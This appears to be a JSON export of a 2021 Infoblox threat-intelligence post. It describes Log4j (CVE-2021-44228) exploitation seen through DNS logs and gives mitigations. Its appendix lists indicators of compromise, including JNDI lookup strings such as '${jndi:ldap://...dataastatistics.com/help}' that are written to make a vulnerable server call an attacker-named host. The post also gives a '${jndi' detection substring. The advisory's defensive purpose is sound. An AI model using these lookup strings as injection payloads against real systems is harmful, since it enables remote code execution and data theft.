{"id":7326,"date":"2021-12-13T14:45:34","date_gmt":"2021-12-13T22:45:34","guid":{"rendered":"https:\/\/blogs.infoblox.com\/?p=7326"},"modified":"2024-08-07T12:18:04","modified_gmt":"2024-08-07T19:18:04","slug":"log4j-exploit-harvesting","status":"publish","type":"post","link":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/","title":{"rendered":"Log4j Exploit Harvesting"},"content":{"rendered":"<h3><strong>Author: Ren\u00e9e Burton and Christopher Kim<\/strong><\/h3>\n<p>&nbsp;<\/p>\n<h3>1. Overview<\/h3>\n<p>On 9 December, the National Institute of Standards and Technology disclosed a critical vulnerability in Log4j, which is a widely adopted logging software.<sup>1<\/sup> This vulnerability is CVE-2021-44228, and it allows attackers to execute arbitrary code on a remote server. Because the vulnerability is easy to exploit, the global security industry immediately observed attackers in the wild and rapidly responded by identifying problems in software and mitigating risks. At the same time, attackers immediately began taking advantage of the vulnerability and have exploited systems worldwide. <\/p>\n<p>We at Infoblox have observed multiple attacks via DNS; we are monitoring and updating our systems continuously. Out of an abundance of caution, we are adding all suspicious indicators to the blocklists for our customers. <\/p>\n<h3>2. Customer impact<\/h3>\n<p>Log4j is a logging utility built into many software applications, and organizations might not realize they rely upon it. When exploiting the vulnerability, an attacker executes code on a remote system and might be able to take control of or sabotage it. <\/p>\n<p>The ease with which the attackers can distribute arbitrary malware through CVE-2021-44228 makes this exploit particularly dangerous. Exploits related to cryptocurrency mining have been reported in the industry,<sup>2<\/sup> and we at Infoblox have also seen some exploitation via illegal DNS queries and have observed indicators associated with ransomware and information stealers.  <\/p>\n<h3>3. Campaign analysis<\/h3>\n<p>Like other security vendors, Infoblox discovered attempts to exploit this vulnerability shortly after it was disclosed. Attackers are using commonly available vulnerability-testing tools to locate victims and are transmitting malware when a victim connects to a domain or an IP they control. The malware itself varies widely.<\/p>\n<p>We have observed that illegal DNS queries are often triggered during the process. These queries contain not only the special characters necessary to exploit the remote system but, often, also the attacker-controlled domain or IP as well. Queries performed In the context of vulnerability testing might contain information about the scanned network as well as the vulnerability-testing tool. Although these queries do not resolve and do not create communication with the attacker\u2019s infrastructure, they can indicate an ongoing attack or a previous compromise. <\/p>\n<p>In particular, DNS queries that contain the substring \u201c${jndi\u201d are correlated with scanning for or exploitation of the vulnerability. By examining the logs of these DNS queries, we have discovered vulnerability scanning, attempted exploits, and successful compromises. <\/p>\n<p>Like others in the industry, we are in the process of discovering and analyzing potential threats. We have noticed, for example, that the attackers are leveraging domains they have registered over the past two months. We have also learned that, in some cases, these domains have hosted some benign content, not just malicious content, and this has helped the attackers appear less suspicious. <\/p>\n<h3>4. Attack chain<\/h3>\n<p>The infection chain begins when an attacker sends a specially crafted HTTP request to a target system that uses Log4j. Next, Log4j creates a log entry by using the exploit string assigned to the HTTP user-agent header. The exploit string prompts Log4j to make a network request to the attacker-controlled server, such as an LDAP or HTTP server, via the JNDI: one of several lookup plugins available to Log4j. The JNDI plugin is particularly useful to attackers because it allows them not only to fetch the values of environment variables in the target system but also to freely define the URL and protocol resource for the JNDI network connection.<sup>3<\/sup><\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-7338 size-large\" src=\"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/cyber-campaign-briefs-log4j-exploit-harvesting-img.png\" alt=\"\" width=\"500\" srcset=\"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/cyber-campaign-briefs-log4j-exploit-harvesting-img.png 736w, https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/cyber-campaign-briefs-log4j-exploit-harvesting-img-200x300.png 200w, https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/cyber-campaign-briefs-log4j-exploit-harvesting-img-683x1024.png 683w\" sizes=\"(max-width: 736px) 100vw, 736px\" \/><\/p>\n<h3>5. Vulnerabilities and mitigation<\/h3>\n<p>These attackers are taking advantage of vulnerability CVE-2021-44228, which impacts all versions of Log4j &lt;= 2.14.1. As a mitigation, we recommend that organizations upgrade the Log4j library to version 2.15.<br \/>\nFor those who are using versions 2.10 to 2.14.1 and cannot upgrade to 2.15 immediately, we recommend, as an interim solution, disabling lookup actions for messages by setting the parameters to the following values:<\/p>\n<ul>\n<li>log4j2.formatMsgNoLookups=true (Log4j 2)<\/li>\n<li>LOG4J_FORMAT_MSG_NO_LOOKUPS=true (Log4j)<\/li>\n<li>kubectl set env LOG4J_FORMAT_MSG_NO_LOOKUPS=true (for Kubernetes clusters)<\/li>\n<\/ul>\n<p>Alternatively, customers can remove the JNDILookup gadget by removing the JndiLookup class from the log4jar file, zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class.<\/p>\n<p>We also recommend that customers and security vendors check their DNS logs for illegal queries that contain the string \u201c${jndi\u201d. This string might be anywhere in the query name and might be incomplete, but, in many events, it will contain elements of the attacker\u2019s infrastructure. Connections to suspicious domains or IPs should be blocked.<\/p>\n<h3>Appendix<\/h3>\n<table width=\"665\">\n<tbody>\n<tr>\n<td width=\"543\"><strong>Representative Indicators of Compromise<\/strong><\/td>\n<td width=\"122\"><strong>Description<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"543\">198[.]54[.]117[.]244<\/p>\n<p>191[.]101[.]132[.]152<\/p>\n<p>46[.]4[.]51[.]212<\/td>\n<td width=\"122\">Suspicious IPs<\/td>\n<\/tr>\n<tr>\n<td width=\"543\">distryp[.]com<\/p>\n<p>dataastatistics[.]com<\/p>\n<p>dataanalysise[.]com<\/td>\n<td width=\"122\">Suspicious domains<\/td>\n<\/tr>\n<tr>\n<td width=\"543\">127.0.0.1${jndi:ldap:\/\/victim-information.rand-string.dataastatistics.com\/help},\\ 191[.]101[.]132[.]152<\/p>\n<p>${jndi:ldap:\/\/10.0.0.1\/test}<\/td>\n<td width=\"122\">Example illegal DNS queries (redacted)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Endnotes<\/h3>\n<ol>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228<\/a><\/li>\n<li><a href=\"https:\/\/blog.talosintelligence.com\/2021\/12\/apache-log4j-rce-vulnerability.html\" target=\"_blank\" rel=\"noopener\">https:\/\/blog.talosintelligence.com\/2021\/12\/apache-log4j-rce-vulnerability.html<\/a><\/li>\n<li><a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/manual\/lookups.html\" target=\"_blank\" rel=\"noopener\">https:\/\/logging.apache.org\/log4j\/2.x\/manual\/lookups.html<\/a><\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>Author: Ren\u00e9e Burton and Christopher Kim &nbsp; 1. Overview On 9 December, the National Institute of Standards and Technology disclosed a critical vulnerability in Log4j, which is a widely adopted logging software.1 This vulnerability is CVE-2021-44228, and it allows attackers to execute arbitrary code on a remote server. Because the vulnerability is easy to exploit, [&hellip;]<\/p>\n","protected":false},"author":397,"featured_media":6869,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[553],"tags":[236,488,614,294,40,189],"class_list":{"0":"post-7326","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cyber-campaign-briefs","8":"tag-cyberthreat","9":"tag-cyberthreat-intelligence-report","10":"tag-log4j","11":"tag-malspam","12":"tag-threat-intelligence","13":"tag-cybersecurity","14":"entry"},"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.3 (Yoast SEO v27.3) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Critical Cyber Vulnerability Found in Log4j Logging Utility | Cyber Campaign Brief | Infoblox<\/title>\n<meta name=\"description\" content=\"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Log4j Exploit Harvesting\" \/>\n<meta property=\"og:description\" content=\"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/\" \/>\n<meta property=\"og:site_name\" content=\"Infoblox Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-13T22:45:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-07T19:18:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"612\" \/>\n\t<meta property=\"og:image:height\" content=\"408\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Infoblox Threat Intel\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Infoblox Threat Intel\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/\"},\"author\":{\"name\":\"Infoblox Threat Intel\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\"},\"headline\":\"Log4j Exploit Harvesting\",\"datePublished\":\"2021-12-13T22:45:34+00:00\",\"dateModified\":\"2024-08-07T19:18:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/\"},\"wordCount\":816,\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-ccb-2.jpg\",\"keywords\":[\"Cyberthreat\",\"Cyberthreat intelligence report\",\"Log4j\",\"Malspam\",\"Threat Intelligence\",\"Cybersecurity\"],\"articleSection\":[\"Cyber Campaign Briefs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/\",\"name\":\"Critical Cyber Vulnerability Found in Log4j Logging Utility | Cyber Campaign Brief | Infoblox\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-ccb-2.jpg\",\"datePublished\":\"2021-12-13T22:45:34+00:00\",\"dateModified\":\"2024-08-07T19:18:04+00:00\",\"description\":\"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-ccb-2.jpg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/ciu-ccb-2.jpg\",\"width\":612,\"height\":408,\"caption\":\"computer virus transfer into desktop pc by internet LAN line. double exposure shot of backside of a computer and red binary codes. hacker virus spyware ransomware and security breached concepts.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/log4j-exploit-harvesting\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infoblox Threat Intel\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/category\\\/threat-intelligence\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Cyber Campaign Briefs\",\"item\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/category\\\/threat-intelligence\\\/cyber-campaign-briefs\\\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Log4j Exploit Harvesting\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"name\":\"infoblox.com\\\/blog\\\/\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#organization\",\"name\":\"Infoblox\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"contentUrl\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/wp-content\\\/uploads\\\/infoblox-logo-2.svg\",\"width\":137,\"height\":30,\"caption\":\"Infoblox\"},\"image\":{\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/#\\\/schema\\\/person\\\/b6aed8965e3298a0817c16d32c0a67ae\",\"name\":\"Infoblox Threat Intel\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"url\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"contentUrl\":\"https:\\\/\\\/blogs.infoblox.com\\\/wp-content\\\/uploads\\\/avatar_user_397_1714162589-96x96.png\",\"caption\":\"Infoblox Threat Intel\"},\"description\":\"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.\",\"url\":\"https:\\\/\\\/www.infoblox.com\\\/blog\\\/author\\\/infoblox-threat-intel\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Critical Cyber Vulnerability Found in Log4j Logging Utility | Cyber Campaign Brief | Infoblox","description":"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/","og_locale":"en_US","og_type":"article","og_title":"Log4j Exploit Harvesting","og_description":"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide","og_url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/","og_site_name":"Infoblox Blog","article_published_time":"2021-12-13T22:45:34+00:00","article_modified_time":"2024-08-07T19:18:04+00:00","og_image":[{"width":612,"height":408,"url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg","type":"image\/jpeg"}],"author":"Infoblox Threat Intel","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Infoblox Threat Intel","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#article","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/"},"author":{"name":"Infoblox Threat Intel","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae"},"headline":"Log4j Exploit Harvesting","datePublished":"2021-12-13T22:45:34+00:00","dateModified":"2024-08-07T19:18:04+00:00","mainEntityOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/"},"wordCount":816,"publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg","keywords":["Cyberthreat","Cyberthreat intelligence report","Log4j","Malspam","Threat Intelligence","Cybersecurity"],"articleSection":["Cyber Campaign Briefs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/","url":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/","name":"Critical Cyber Vulnerability Found in Log4j Logging Utility | Cyber Campaign Brief | Infoblox","isPartOf":{"@id":"https:\/\/www.infoblox.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#primaryimage"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#primaryimage"},"thumbnailUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg","datePublished":"2021-12-13T22:45:34+00:00","dateModified":"2024-08-07T19:18:04+00:00","description":"The vulnerability allows attackers to execute arbitrary code on a remote server. Attackers have begun taking advantage of the vulnerability and have exploited systems worldwide","breadcrumb":{"@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#primaryimage","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/ciu-ccb-2.jpg","width":612,"height":408,"caption":"computer virus transfer into desktop pc by internet LAN line. double exposure shot of backside of a computer and red binary codes. hacker virus spyware ransomware and security breached concepts."},{"@type":"BreadcrumbList","@id":"https:\/\/www.infoblox.com\/blog\/threat-intelligence\/cyber-campaign-briefs\/log4j-exploit-harvesting\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.infoblox.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Infoblox Threat Intel","item":"https:\/\/www.infoblox.com\/blog\/category\/threat-intelligence\/"},{"@type":"ListItem","position":3,"name":"Cyber Campaign Briefs","item":"https:\/\/www.infoblox.com\/blog\/category\/threat-intelligence\/cyber-campaign-briefs\/"},{"@type":"ListItem","position":4,"name":"Log4j Exploit Harvesting"}]},{"@type":"WebSite","@id":"https:\/\/www.infoblox.com\/blog\/#website","url":"https:\/\/www.infoblox.com\/blog\/","name":"infoblox.com\/blog\/","description":"","publisher":{"@id":"https:\/\/www.infoblox.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.infoblox.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.infoblox.com\/blog\/#organization","name":"Infoblox","url":"https:\/\/www.infoblox.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","contentUrl":"https:\/\/www.infoblox.com\/blog\/wp-content\/uploads\/infoblox-logo-2.svg","width":137,"height":30,"caption":"Infoblox"},"image":{"@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.infoblox.com\/blog\/#\/schema\/person\/b6aed8965e3298a0817c16d32c0a67ae","name":"Infoblox Threat Intel","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","url":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","contentUrl":"https:\/\/blogs.infoblox.com\/wp-content\/uploads\/avatar_user_397_1714162589-96x96.png","caption":"Infoblox Threat Intel"},"description":"Infoblox Threat Intel is the leading creator of original DNS threat intelligence, distinguishing itself in a sea of aggregators. What sets us apart? Two things: mad DNS skills and unparalleled visibility. DNS is notoriously tricky to interpret and hunt from, but our deep understanding and unique access to the internet's inner workings allow us to track down threat actors that others can't see. We're proactive, not just defensive, using our insights to disrupt cybercrime where it begins. We also believe in sharing knowledge to support the broader security community by publishing detailed research and releasing indicators on GitHub. In addition, our intel is seamlessly integrated into our Infoblox Protective DNS solutions, so customers automatically get its benefits, along with ridiculously low false positive rates.","url":"https:\/\/www.infoblox.com\/blog\/author\/infoblox-threat-intel\/"}]}},"_links":{"self":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/7326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/users\/397"}],"replies":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/comments?post=7326"}],"version-history":[{"count":9,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/7326\/revisions"}],"predecessor-version":[{"id":7348,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/posts\/7326\/revisions\/7348"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media\/6869"}],"wp:attachment":[{"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/media?parent=7326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/categories?post=7326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.infoblox.com\/blog\/wp-json\/wp\/v2\/tags?post=7326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}